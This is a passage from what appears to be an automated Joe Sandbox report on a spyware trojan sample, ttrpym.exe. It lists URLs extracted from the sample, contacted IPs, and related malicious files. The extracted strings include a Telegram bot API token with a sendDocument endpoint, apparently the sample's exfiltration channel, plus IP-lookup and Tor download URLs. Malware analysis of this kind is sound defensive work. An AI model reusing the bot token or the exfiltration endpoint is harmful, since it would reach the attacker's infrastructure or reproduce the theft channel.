              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              http://www.founder.com.cn/cn/m0%Avira URL Cloudsafe
              https://api.telegram.orgx&.q0%Avira URL Cloudsafe
              http://ocsp.godaddy.c0%Avira URL Cloudsafe
              http://www.carterandcone.comd0%URL Reputationsafe
              http://www.carterandcone.comd0%URL Reputationsafe
              http://www.carterandcone.comd0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htmJU0%Avira URL Cloudsafe
              http://www.sandoll.co.krl0%Avira URL Cloudsafe
              http://en.w0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://www.zhongyicts.com.cnj0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.founder.com.cn/cn/0%URL Reputationsafe
              http://www.founder.com.cn/cn/0%URL Reputationsafe
              http://www.founder.com.cn/cn/0%URL Reputationsafe
              http://www.tiro.comrporation0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cnad0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cnamFA0%Avira URL Cloudsafe
              http://www.fontbureau.comgritaC0%Avira URL Cloudsafe
              http://www.ascendercorp.com/typedesigners.htmlXUJl0%Avira URL Cloudsafe
              http://www.carterandcone.comkYF=0%Avira URL Cloudsafe
              http://www.carterandcone.comn-u0%URL Reputationsafe
              http://www.carterandcone.comn-u0%URL Reputationsafe
              http://www.carterandcone.comn-u0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.zhongyicts.com.cnma0%Avira URL Cloudsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.carterandcone.comroa0%Avira URL Cloudsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.sandoll.co.krs-c0%Avira URL Cloudsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cnm0%Avira URL Cloudsafe
              http://www.sandoll.c0%Avira URL Cloudsafe
              https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
              https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
              https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
              https://api.telegram.orgx&.qloN0%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.carterandcone.comad0%Avira URL Cloudsafe
              http://www.urwpp.de0%URL Reputationsafe
              http://www.urwpp.de0%URL Reputationsafe
              http://www.urwpp.de0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api.telegram.org
              149.154.167.220
              truefalse
                high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.carterandcone.comesttrpym.exe, 00000000.00000003.239292340.0000000005E7B000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.fontbureau.com/designers/frere-jones.html.ttrpym.exe, 00000000.00000003.245072326.0000000005E7B000.00000004.00000001.sdmpfalse
                  high
                  http://crl.godaddy.com/gdig2s1-1823.crl0ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designersttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designerskYlHttrpym.exe, 00000000.00000003.244441566.0000000005E7D000.00000004.00000001.sdmpfalse
                        high
                        http://www.fontbureau.comttvaZttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.zhongyicts.com.cnr-cttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.sajatypeworks.comttrpym.exe, 00000000.00000003.233656365.0000000005E62000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/cThettrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.commattrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers)Yttrpym.exe, 00000000.00000003.245883722.0000000005E7B000.00000004.00000001.sdmpfalse
                          high
                          http://www.carterandcone.comamFAttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.urwpp.deoittrpym.exe, 00000000.00000003.243771789.0000000005E7D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlPttrpym.exe, 00000000.00000003.245112917.0000000005E9E000.00000004.00000001.sdmpfalse
                            high
                            http://www.galapagosdesign.com/DPleasettrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/ttrpym.exe, 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpfalse
                              high
                              http://www.ascendercorp.com/typedesigners.htmlttrpym.exe, 00000000.00000003.242053272.0000000005E83000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?Y0ttrpym.exe, 00000000.00000003.244251584.0000000005E7D000.00000004.00000001.sdmpfalse
                                high
                                http://www.urwpp.deDPleasettrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnompttrpym.exe, 00000000.00000003.238437682.0000000005E7B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.urwpp.dewattrpym.exe, 00000000.00000003.243571729.0000000005E7D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.zhongyicts.com.cnttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://certificates.godaddy.com/repository/gdig2.crt0ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipttrpym.exe, 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/mttrpym.exe, 00000000.00000003.238160822.0000000005E7B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.orgx&.qttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://ocsp.godaddy.cttrpym.exe, 00000003.00000003.469945835.0000000007DCC000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.comdttrpym.exe, 00000000.00000003.239366599.0000000005E7B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hattrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmJUttrpym.exe, 00000000.00000003.247669599.0000000005E7B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://certs.godaddy.com/repository/1301ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.sandoll.co.krlttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://certs.godaddy.com/repository/0ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                      high
                                      https://certs.godaddy.com/repositorttrpym.exe, 00000003.00000003.469945835.0000000007DCC000.00000004.00000001.sdmpfalse
                                        high
                                        http://en.wttrpym.exe, 00000000.00000003.235365275.0000000005E7B000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.zhongyicts.com.cnjttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comlttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cn/ttrpym.exe, 00000000.00000003.238052266.0000000005E7B000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.godaddy.com/gdroot-g2.crl0Fttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers/frere-jones.htmlttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.tiro.comrporationttrpym.exe, 00000000.00000003.238437682.0000000005E7B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.zhongyicts.com.cnadttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.zhongyicts.com.cnamFAttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comgritaCttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ascendercorp.com/typedesigners.htmlXUJlttrpym.exe, 00000000.00000003.241273039.0000000005E83000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comkYF=ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.fontbureau.com/designersGttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.carterandcone.comn-uttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/?ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designersLttrpym.exe, 00000000.00000003.244027978.0000000005E7D000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bThettrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.telegram.orgttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://certificates.godaddy.com/repository/0ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers?ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.zhongyicts.com.cnmattrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.tiro.comttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.carterandcone.comroattrpym.exe, 00000000.00000003.239201394.0000000005E7B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.goodfont.co.krttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.carterandcone.comttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sandoll.co.krs-cttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.typography.netDttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmttrpym.exe, 00000000.00000003.247619500.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://fontfabrik.comttrpym.exe, 00000000.00000003.234788164.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cnmttrpym.exe, 00000000.00000003.237899138.0000000005E80000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.sandoll.cttrpym.exe, 00000000.00000003.237222343.0000000005E7B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/sendDocumentttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://api.ipify.org%GETMozilla/5.0ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          low
                                                          https://api.telegram.orgx&.qloNttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://www.fonts.comttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.sandoll.co.krttrpym.exe, 00000000.00000003.237222343.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comadttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.urwpp.dettrpym.exe, 00000000.00000003.246313205.0000000005E88000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.243655870.0000000005E7D000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sakkal.comttrpym.exe, 00000000.00000003.242053272.0000000005E83000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.carterandcone.comexcttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.comttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://DynDns.comDynDNSttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sajatypeworks.comtttrpym.exe, 00000000.00000003.233656365.0000000005E62000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.carterandcone.comTCttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/sttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.tiro.compttrpym.exe, 00000000.00000003.239902821.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api.ipify.org%(ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  http://www.tiro.comlicttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.239945309.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/sendDocumentdocument-----ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.carterandcone.comddttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://pmTUNK.comttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.founder.com.cn/cnttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.carterandcone.comhlyttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/cabarga.htmlttrpym.exe, 00000000.00000003.245848821.0000000005E9E000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.monotype.ttrpym.exe, 00000000.00000003.243086872.0000000005E7D000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.commttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://crl.godaddy.com/gdroot.crl0Fttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.carterandcone.comEacdWttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers8ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.carterandcone.comt;Fttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            http://cert.sttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designers/mttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpfalse
                                                                              high

                                                                              Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              149.154.167.220
                                                                              unknownUnited Kingdom
                                                                              62041TELEGRAMRUfalse

                                                                              Private

                                                                              IP
                                                                              192.168.2.1

                                                                              General Information

                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                              Analysis ID:345001
                                                                              Start date:27.01.2021
                                                                              Start time:15:38:48
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 9m 8s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:ttrpym.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:23
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@26/2
                                                                              EGA Information:Failed
                                                                              HDC Information:
                                                                              • Successful, ratio: 5.9% (good quality ratio 5.8%)
                                                                              • Quality average: 90.8%
                                                                              • Quality standard deviation: 21%
                                                                              HCA Information:
                                                                              • Successful, ratio: 75%
                                                                              • Number of executed functions: 145
                                                                              • Number of non-executed functions: 18
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Found application associated with file extension: .exe
                                                                              Warnings:
                                                                              Show All
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 104.43.193.48, 168.61.161.212, 40.88.32.150, 23.210.248.85, 51.104.144.132, 67.26.81.254, 8.248.121.254, 8.241.123.254, 67.27.159.254, 67.27.158.126, 93.184.221.240, 51.103.5.159, 52.155.217.156, 20.54.26.129, 95.101.22.224, 95.101.22.216, 51.104.139.180
                                                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/345001/sample/ttrpym.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              15:39:49API Interceptor1008x Sleep call for process: ttrpym.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              149.154.167.220SecuriteInfo.com.Trojan.PackedNET.519.21836.exeGet hashmaliciousBrowse
                                                                                RFQ RPM202011-776JD.jpg.lnkGet hashmaliciousBrowse
                                                                                  commercial invoice packing list.xlsxGet hashmaliciousBrowse
                                                                                    Updated Invoice{swift..exeGet hashmaliciousBrowse
                                                                                      RFQ #6553928_PDF.exeGet hashmaliciousBrowse
                                                                                        MTD INVOICE.exeGet hashmaliciousBrowse
                                                                                          Payment Confirmation Paper - Customer Copy_pdf.exeGet hashmaliciousBrowse
                                                                                            MDS5932RFQ.exeGet hashmaliciousBrowse
                                                                                              TJyVCvjegT.exeGet hashmaliciousBrowse
                                                                                                Simulteanous-Project.exeGet hashmaliciousBrowse
                                                                                                  PO 012658.exeGet hashmaliciousBrowse
                                                                                                    RQN0004266.exeGet hashmaliciousBrowse
                                                                                                      tnD89iJ2Vx.exeGet hashmaliciousBrowse
                                                                                                        zff.exeGet hashmaliciousBrowse
                                                                                                          trr.exeGet hashmaliciousBrowse
                                                                                                            4dVgkhY953.exeGet hashmaliciousBrowse
                                                                                                              CI_PL_BL.xlsxGet hashmaliciousBrowse
                                                                                                                RFQ 130121.exeGet hashmaliciousBrowse
                                                                                                                  PO 130121.exeGet hashmaliciousBrowse
                                                                                                                    ttr.exeGet hashmaliciousBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                      api.telegram.orgSecuriteInfo.com.Trojan.PackedNET.519.21836.exeGet hashmaliciousBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      RFQ RPM202011-776JD.jpg.lnkGet hashmaliciousBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      commercial invoice packing list.xlsxGet hashmaliciousBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Updated Invoice{swift..exeGet hashmaliciousBrowse
